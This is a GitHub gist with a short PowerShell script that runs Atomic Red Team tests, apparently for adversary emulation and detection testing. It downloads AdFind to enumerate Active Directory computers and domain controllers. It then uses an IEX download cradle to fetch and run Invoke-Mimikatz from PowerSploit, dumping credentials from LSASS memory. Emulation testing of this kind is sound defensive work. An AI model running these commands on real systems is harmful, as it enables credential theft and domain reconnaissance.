Last active
August 19, 2022 22:31
-
-
Save rc-MikeDevens/91b84b72179d9496e6c469142e05f1de to your computer and use it in GitHub Desktop.
PowerShell script to run Atomic Red Team tests for T1018 and T1003.001
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # T1018 - Remote System Discovery | |
| # Using AdFind (S0552) | |
| $adfind_path = "$env:LOCALAPPDATA\adfind.exe" | |
| Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile $adfind_path | |
| if (Test-Path $adfind_path) { | |
| # Test #10 - Adfind - Enumerate Active Directory Computer Objects | |
| $cmd = "`"$adfind_path`" -f (objectcategory=computer)" | |
| cmd.exe /c $cmd | |
| # Test #11 - Enumerate Active Directory Domain Controller Objects | |
| $cmd = "`"$adfind_path`" -sc dclist" | |
| cmd.exe /c $cmd | |
| # Cleanup | |
| Remove-Item -Path $adfind_path -Force | |
| } else {exit 1} | |
| # T1059.001 - Command and Scripting Interpreter: PowerShell | |
| # T1003.001 - OS Credential Dumping: LSASS Memory | |
| # Using Mimikatz (S0002) | |
| # Test #1 - Powershell Mimikatz | |
| $remote_script = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1" | |
| IEX (New-Object Net.WebClient).DownloadString($remote_script) | |
| Invoke-Mimikatz -DumpCreds |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment